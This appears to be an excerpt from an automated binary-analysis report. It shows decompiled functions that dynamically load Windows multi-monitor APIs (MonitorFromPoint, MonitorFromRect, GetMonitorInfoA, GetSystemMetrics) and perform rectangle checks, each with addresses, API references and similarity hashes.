                                            Function 0096529C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64libraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 75%
                                            			E0096529C(void* __eax, struct _WNDCLASSEXW* __ebx, void* __edx, struct HINSTANCE__* __edi, WCHAR* __esi) {
				char _v8;
				CHAR* _t20;
				struct HINSTANCE__* _t21;
				void* _t28;
				char _t29;
				intOrPtr _t34;
				void* _t37;
				_Unknown_base(*)()* _t40;
				intOrPtr _t44;

				_push(_t29);
				_v8 = _t29;
				_t37 = __edx;
				_t28 = __eax;
				GetClassInfoExW(__edi, __esi, __ebx);
				_push(_t44);
				_push(0x96535b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t44;
				if( *0x0099C928 != 0) {
					L13:
					_pop(_t34);
					 *[fs:eax] = _t34;
					_push(0x965362);
					return E00943FB0( &_v8);
				}
				if( *0x99c924 == 0) {
					_t40 = 0;
					L8:
					if(_t40 != 0) {
						if(_t28 != 0) {
							 *0x99c930 = 1;
						}
					}
					 *((char*)(0x99c928)) = 1;
					goto L13;
				}
				if(_t28 == 0 &&  *0x99c930 == 0) {
					 *0x99c910 = E0096529C(4, _t28,  *0x99c910, _t37, 0);
					if( *0x99c930 == 0) {
						E00943FB0( &_v8);
					}
				}
				_t20 = E00944470(_v8);
				_t21 =  *0x99c924; // 0x73fa0000
				_t40 = GetProcAddress(_t21, _t20);
				goto L8;
			}












                                            0x0096529f
                                            0x009652a3
                                            0x009652a6
                                            0x009652a8
                                            0x009652ad
                                            0x009652b4
                                            0x009652b5
                                            0x009652ba
                                            0x009652bd
                                            0x009652cd
                                            0x00965345
                                            0x00965347
                                            0x0096534a
                                            0x0096534d
                                            0x0096535a
                                            0x0096535a
                                            0x009652d6
                                            0x00965325
                                            0x00965327
                                            0x00965329
                                            0x00965331
                                            0x00965333
                                            0x00965333
                                            0x00965331
                                            0x0096533e
                                            0x00000000
                                            0x0096533e
                                            0x009652da
                                            0x009652f7
                                            0x00965303
                                            0x00965308
                                            0x00965308
                                            0x00965303
                                            0x00965310
                                            0x00965316
                                            0x00965321
                                            0x00000000

                                            APIs
                                            • GetClassInfoExW.USER32 ref: 009652AD
                                            • GetProcAddress.KERNEL32(73FA0000,00000000), ref: 0096531C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AddressClassInfoProc
                                            • String ID: GetMonitorInfoA
                                            • API String ID: 2840977943-2497991506
                                            • Opcode ID: 4f03414a94fc6dc72f25f65b71996cdd1facee8d701186b6e6618d3f6b05c3cd
                                            • Instruction ID: 1ee50c1832555e24f616ca72046f85a66f16272715fd8bc76dc5d2061eeedad4
                                            • Opcode Fuzzy Hash: 4f03414a94fc6dc72f25f65b71996cdd1facee8d701186b6e6618d3f6b05c3cd
                                            • Instruction Fuzzy Hash: 651157B0909A84EFE711DB38DC16F6D7BE8A789BC4F4704A5E84083321D3B45D04E760
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0096F9D4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0096F9D4(void* __eflags, intOrPtr _a4) {
				char _v5;
				struct tagRECT _v21;
				struct tagRECT _v40;
				void* _t40;
				void* _t45;

				_v5 = 1;
				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
				_t45 = E00956CE4( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
				if(_t45 <= 0) {
					L5:
					_v5 = 0;
				} else {
					do {
						_t45 = _t45 - 1;
						_t40 = E00956C88(_t44, _t45);
						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
							goto L4;
						} else {
							E0096EFF4(_t40,  &_v40);
							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
								goto L4;
							}
						}
						goto L6;
						L4:
					} while (_t45 > 0);
					goto L5;
				}
				L6:
				return _v5;
			}








                                            0x0096f9dd
                                            0x0096f9ea
                                            0x0096f9fd
                                            0x0096fa01
                                            0x0096fa51
                                            0x0096fa51
                                            0x0096fa03
                                            0x0096fa03
                                            0x0096fa03
                                            0x0096fa0d
                                            0x0096fa13
                                            0x00000000
                                            0x0096fa1b
                                            0x0096fa20
                                            0x0096fa34
                                            0x0096fa4b
                                            0x00000000
                                            0x00000000
                                            0x0096fa4b
                                            0x00000000
                                            0x0096fa4d
                                            0x0096fa4d
                                            0x00000000
                                            0x0096fa03
                                            0x0096fa55
                                            0x0096fa5e

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Rect$EqualIntersect
                                            • String ID: @
                                            • API String ID: 3291753422-2766056989
                                            • Opcode ID: 055d6cce969786f0a73ead6b00910fb78e6db5fa0ef9e15725653910900bfbf5
                                            • Instruction ID: e52c8cf59d71153989f3f10f669b4f336c920654ab4512f5e45740c8d60e35bb
                                            • Opcode Fuzzy Hash: 055d6cce969786f0a73ead6b00910fb78e6db5fa0ef9e15725653910900bfbf5
                                            • Instruction Fuzzy Hash: 3F114C31A042489BCB11DBACC895B9E7BECAF89358F0442A1FD48DB342D771DD058790
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00965534, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 68%
                                            			E00965534(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _a12;
				if( *0x99c92b != 0) {
					_t16 = 0;
					if((_t19 & 0x00000003) != 0) {
						L7:
						_t16 = 0x12340042;
					} else {
						_t21 = _a4;
						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
							goto L7;
						}
					}
				} else {
					_t18 =  *0x99c90c; // 0x965534
					 *0x99c90c = E0096529C(3, _t15, _t18, _t19, _t20);
					_t16 =  *0x99c90c(_a4, _a8, _t19);
				}
				return _t16;
			}













                                            0x0096553a
                                            0x00965544
                                            0x0096556e
                                            0x00965577
                                            0x0096559f
                                            0x0096559f
                                            0x00965579
                                            0x00965579
                                            0x0096557e
                                            0x00000000
                                            0x00000000
                                            0x0096557e
                                            0x00965546
                                            0x0096554b
                                            0x00965558
                                            0x0096556a
                                            0x0096556a
                                            0x009655aa

                                            APIs
                                            • GetSystemMetrics.USER32 ref: 00965582
                                            • GetSystemMetrics.USER32 ref: 00965594
                                              • Part of subcall function 0096529C: GetClassInfoExW.USER32 ref: 009652AD
                                              • Part of subcall function 0096529C: GetProcAddress.KERNEL32(73FA0000,00000000), ref: 0096531C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MetricsSystem$AddressClassInfoProc
                                            • String ID: MonitorFromPoint
                                            • API String ID: 326684619-1072306578
                                            • Opcode ID: 9b60a503696d91be38f9656ef76388a0a6a5cc47976c7e37ad05c5627478a121
                                            • Instruction ID: 5641229bfaffd357e6af730b5b30a1522d4e6d4fc6fe491d9c1de64a1d31b87f
                                            • Opcode Fuzzy Hash: 9b60a503696d91be38f9656ef76388a0a6a5cc47976c7e37ad05c5627478a121
                                            • Instruction Fuzzy Hash: 0501D171206608AFDB10AF99DC48B9ABB56EF84754F418027F9479B251C770AC009BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0096540C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 68%
                                            			E0096540C(intOrPtr* _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t16;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t14 = _a4;
				if( *0x99c92a != 0) {
					_t19 = 0;
					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
						_t19 = 0x12340042;
					}
				} else {
					_t16 =  *0x99c908; // 0x96540c
					 *0x99c908 = E0096529C(2, _t14, _t16, _t17, _t18);
					_t19 =  *0x99c908(_t14, _t17);
				}
				return _t19;
			}












                                            0x00965412
                                            0x00965415
                                            0x0096541f
                                            0x00965444
                                            0x0096544d
                                            0x00965474
                                            0x00965474
                                            0x00965421
                                            0x00965426
                                            0x00965433
                                            0x00965440
                                            0x00965440
                                            0x0096547f

                                            APIs
                                            • GetSystemMetrics.USER32 ref: 0096545D
                                            • GetSystemMetrics.USER32 ref: 00965469
                                              • Part of subcall function 0096529C: GetClassInfoExW.USER32 ref: 009652AD
                                              • Part of subcall function 0096529C: GetProcAddress.KERNEL32(73FA0000,00000000), ref: 0096531C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MetricsSystem$AddressClassInfoProc
                                            • String ID: MonitorFromRect
                                            • API String ID: 326684619-4033241945
                                            • Opcode ID: b20d83480ff4e7244678faebfb45a9a10bc43528d983ab6f3772a2e39624b7a5
                                            • Instruction ID: 5527d78516d5a2c0c413d2ca2e4ec6b0a3f1651f2c14e5110f23470d72767971
                                            • Opcode Fuzzy Hash: b20d83480ff4e7244678faebfb45a9a10bc43528d983ab6f3772a2e39624b7a5
                                            • Instruction Fuzzy Hash: 4301D171205608ABD720CF58EC85B15B759E740362F068092E885CB272CB71ECC0DBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00965384, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00965384(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t8 = _a4;
				if( *0x99c928 == 0) {
					 *0x99c900 = E0096529C(0, _t8,  *0x99c900, _t17, _t18);
					return GetSystemMetrics(_t8);
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}












                                            0x00965388
                                            0x00965392
                                            0x009653a6
                                            0x00000000
                                            0x009653ac
                                            0x009653b4
                                            0x009653bc
                                            0x009653bc
                                            0x009653bf
                                            0x009653d3
                                            0x009653c1
                                            0x009653c1
                                            0x009653d7
                                            0x009653c3
                                            0x009653c3
                                            0x009653c3
                                            0x009653c4
                                            0x009653db
                                            0x009653c6
                                            0x009653c7
                                            0x009653ca
                                            0x009653cc
                                            0x009653cc
                                            0x009653ca
                                            0x009653c4
                                            0x009653c1
                                            0x009653e0
                                            0x009653e3
                                            0x009653ed
                                            0x009653e5
                                            0x00000000
                                            0x009653e6

                                            APIs
                                            • GetSystemMetrics.USER32 ref: 009653E6
                                              • Part of subcall function 0096529C: GetClassInfoExW.USER32 ref: 009652AD
                                              • Part of subcall function 0096529C: GetProcAddress.KERNEL32(73FA0000,00000000), ref: 0096531C
                                            • GetSystemMetrics.USER32 ref: 009653AC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MetricsSystem$AddressClassInfoProc
                                            • String ID: GetSystemMetrics
                                            • API String ID: 326684619-96882338
                                            • Opcode ID: bec16c02edc6575d7da5fc78b614624619420470164a16bdbc44184dc6791c2b
                                            • Instruction ID: 417ddd426311ce5ca9941d6304393ad3e2877a3e96b455f973e7d7632b6d8542
                                            • Opcode Fuzzy Hash: bec16c02edc6575d7da5fc78b614624619420470164a16bdbc44184dc6791c2b
                                            • Instruction Fuzzy Hash: 61F090B0128A04CBCB109B389CC5E27369AA795BF0FE28F23A522493D5C6F89840A614
                                            Uniqueness

                                            Uniqueness Score: -1.00%